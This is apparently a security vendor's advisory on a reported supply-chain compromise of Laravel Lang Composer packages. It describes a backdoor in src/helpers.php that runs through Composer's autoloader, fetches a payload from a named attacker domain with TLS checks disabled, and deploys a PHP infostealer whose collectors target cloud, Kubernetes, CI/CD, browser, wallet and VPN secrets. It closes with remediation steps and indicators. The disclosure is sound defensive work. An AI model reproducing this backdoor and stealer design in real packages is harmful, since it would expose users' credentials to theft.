Socket proactively blocks malicious open source packages in your code.
InstallSecure your dependencies with us
A compromise affecting the community-maintained Laravel Lang project has introduced remote code execution backdoors across multiple packages in the organization, including laravel-lang/lang, laravel-lang/http-statuses, laravel-lang/attributes , and laravel-lang/actions across roughly 700+ historical versions.
The affected packages are not part of the official Laravel framework. They are third-party localization packages used by Laravel applications. However, applications that installed compromised versions may have executed the backdoor automatically when Composer’s autoloader ran.
Newly observed tag activity suggests the compromise was not isolated to a single package. Recently published tags appeared across multiple repositories in the same GitHub organization, including Laravel-Lang/lang, Laravel-Lang/http-statuses, Laravel-Lang/attributes, and Laravel-Lang/actions. The tags were published in rapid succession on May 22 and May 23, 2026, with many versions appearing only seconds apart.
For example, Laravel-Lang/lang tags across the 12.x, 13.x, 14.x, and 15.x lines were published in tight sequence on May 22, while Laravel-Lang/http-statuses and Laravel-Lang/attributes also saw rapid tag creation across historical versions during the same window. Laravel-Lang/actions tags followed shortly after, continuing into May 23 UTC.
Aikido Security also surfaced the compromise publicly, helping alert the Laravel and PHP communities to suspicious activity across Laravel Lang packages. Socket’s analysis of composer/laravel-lang/lang@14.3.7 confirmed a malicious src/helpers.php file registered in composer.json under autoload.files. In Composer packages, files listed under autoload.files are loaded automatically when the Composer autoloader runs, which means the malicious code can execute during normal application runtime.
The timing and pattern of the newly published tags point to a broader compromise of the Laravel Lang organization’s release process, rather than a single malicious package version.
The observed activity includes rapid publication of historical tags across:
Laravel-Lang/langLaravel-Lang/http-statusesLaravel-Lang/attributesLaravel-Lang/actionsMany of these tags were created seconds apart, a pattern that is unusual for normal package maintenance and consistent with automated mass tagging or republishing. The affected repositories belong to the same Laravel Lang GitHub organization, which suggests the attacker may have had access to organization-level credentials, repository automation, or release infrastructure.
This is a developing story. We will publish more information as our investigation continues.
The malicious activity is rooted in a file named src/helpers.php. Because this file is registered in the composer.json under autoload.files, the backdoor is executed automatically on every PHP request handled by the compromised application.
The infection sequence operates as follows:
flipboxstudio[.]info) at runtime using character codes (array_map('chr', [...])) to evade static string analysis.https://flipboxstudio[.]info/payload. To guarantee a successful fetch even under interception or certificate issues, it explicitly disables TLS certificate verification and fakes a Mozilla User-Agent.sys_get_temp_dir()/.laravel_locale/.exec("php ...") on Unix environments, or by generating and running a .vbs script via cscript on Windows systems.This is a highly sophisticated, cross-platform (Linux, macOS, Windows) information stealer written in PHP. It acts as the second-stage payload delivered by the poisoned laravel-lang/attributes package.
Rather than a simple backdoor, this script is a comprehensive credential-harvesting framework designed to systematically strip a compromised server or developer machine of virtually all sensitive data, encrypt it, and exfiltrate it to the C2 server.
Here is a technical breakdown of the malware’s capabilities and execution flow:
https://flipboxstudio.info/exfil.k9X2mP7vL4nQ8wR1) to XOR-encrypt the stolen data before exfiltration.Stealer class initializes 17 distinct "Collectors," each targeting a specific category of software, cloud infrastructure, or operating system secrets.The malware uses a massive dictionary of Regular Expressions to scrape files, databases, and environment variables for API keys (AWS, GitHub, Stripe, Slack, Discord, JWTs, private keys, etc.).
Its specific collectors include:
AwsCollector, CloudCollector): Queries cloud metadata endpoints (e.g., EC2 IMDS at 169.254.169.254) to steal IAM roles and instance identity documents. It also scrapes local configuration files for Azure, Google Cloud (gcloud), DigitalOcean, Heroku, Netlify, and Vercel.K8sCollector): Steals Kubernetes Service Account tokens from /var/run/secrets/..., local kubeconfig files, and Helm registry configurations.VaultCollector): Attempts to find Vault tokens via environment variables, files, or Kubernetes auth, and if successful, recursively queries the Vault API to dump Key-Value secrets.CiCdCollector): Targets build servers, extracting tokens and configurations from Jenkins (including the master.key and credentials.xml), GitLab Runners, GitHub Actions, CircleCI, TravisCI, and ArgoCD.CryptoCollector): Scans for wallet data files (Bitcoin, Ethereum, Monero, etc.) and browser extension local storage (MetaMask, Phantom, Trust Wallet). It also scans desktop/document folders for plaintext files named seed.txt or recovery.txt.BrowserCollector & ChromiumDecryptor): Extracts history, cookies, and login data from Chrome, Edge, Firefox, Brave, and Opera.DebugChromium.exe). The PHP script drops and executes this binary specifically to bypass Chrome v127+ App-Bound Encryption and extract the master decryption key. Firefox is decrypted natively using NSS algorithms.PasswordManagerCollector): Targets local vaults and browser extension data for 1Password, Bitwarden, LastPass, KeePass, Dashlane, and NordPass.ProcessCollector, WindowsCredentialCollector): * Linux: Reads /proc/[pid]/environ and /proc/[pid]/cmdline to steal secrets passed via command-line arguments to running processes.cmdkey), Vault credentials (vaultcmd), .rdp files, and PuTTY/WinSCP saved sessions (including native decryption of WinSCP passwords).MessagingCollector, FtpCollector, EmailCollector): Extracts session tokens from Discord and Slack leveldb storage. Dumps profiles from Outlook, Thunderbird, and popular FTP clients (FileZilla, WinSCP, CoreFTP), often reversing weak proprietary encoding/XOR obfuscation.FileCollector): Scours Windows, macOS, and Linux paths for high-value configuration and credential files, including Docker auth tokens, SSH private keys, Git credentials, shell history files, database history files, Kubernetes cluster configurations, .env files, wp-config.php, and docker-compose.yml.EnvCollector): Captures environment variables loaded into the PHP process and filters for sensitive keys containing terms like KEY, SECRET, API, TOKEN, PASSWORD, AWS_, AZURE_, GCP_ ,STRIPE_, and more, then applies regex patterns to extract recognizable credential formats.GitCollector): Extracts source control credentials from global and local .gitconfig files, .git-credentials, and .netrc files. It parses embedded HTTP basic auth credentials and SSH host configurations associated with GitHub, GitLab, and Bitbucket.VpnCollector): Collects VPN configuration and saved login files for OpenVPN, WireGuard, NetworkManager, and commercial VPNs such as NordVPN, ExpressVPN, CyberGhost, and Mullvad. It parses .ovpn and .conf files to extract embedded usernames, passwords, or referenced auth-user-pass credential files.We're tracking this supply chain attack on a dedicated campaign page: socket.dev/supply-chain-attacks/laravel-lang-compromise
Loading affected packages…
Teams using affected Laravel Lang packages should treat impacted systems as potentially compromised, not just exposed. Check composer.lock for laravel-lang/lang, laravel-lang/http-statuses, and laravel-lang/attributes, and block these packages until clean versions are confirmed.
Because the payload targets cloud metadata, Kubernetes tokens, Vault, CI/CD systems, browser data, password managers, source control credentials, VPN configs, SSH keys, .env files, and local application configs, affected teams should rotate any secrets available to hosts, containers, CI runners, or developer machines that installed or ran the compromised packages.
Prioritize rotation of cloud credentials, Kubernetes Service Account tokens, Vault tokens, CI/CD secrets, GitHub/GitLab/Bitbucket tokens, SSH keys, Docker registry tokens, Laravel APP_KEY, database credentials, API keys, webhook secrets, and credentials stored in environment variables.
Rebuild affected hosts, containers, and CI runners from known-good images where possible. Preserve logs and package artifacts before cleanup, including composer.lock, Composer cache contents, deployment logs, process execution logs, network/DNS logs, cloud audit logs, Kubernetes audit logs, and temp directory contents.
laravel-lang/lang, laravel-lang/http-statuses, laravel-lang/attributesflipboxstudio[.]infohttps://flipboxstudio[.]info/payloadsrc/helpers.phpautoload.files → src/helpers.phpsys_get_temp_dir()/.laravel_locale/169.254.169.254DebugChromium.exephp execution, cscript execution, dropped .php or VBS files, reads from /var/run/secrets/, reads from /proc/[pid]/environ, and outbound requests to flipboxstudio[.]info此内容由惯性聚合(RSS阅读器)自动聚合整理,仅供阅读参考。 原文来自 — 版权归原作者所有。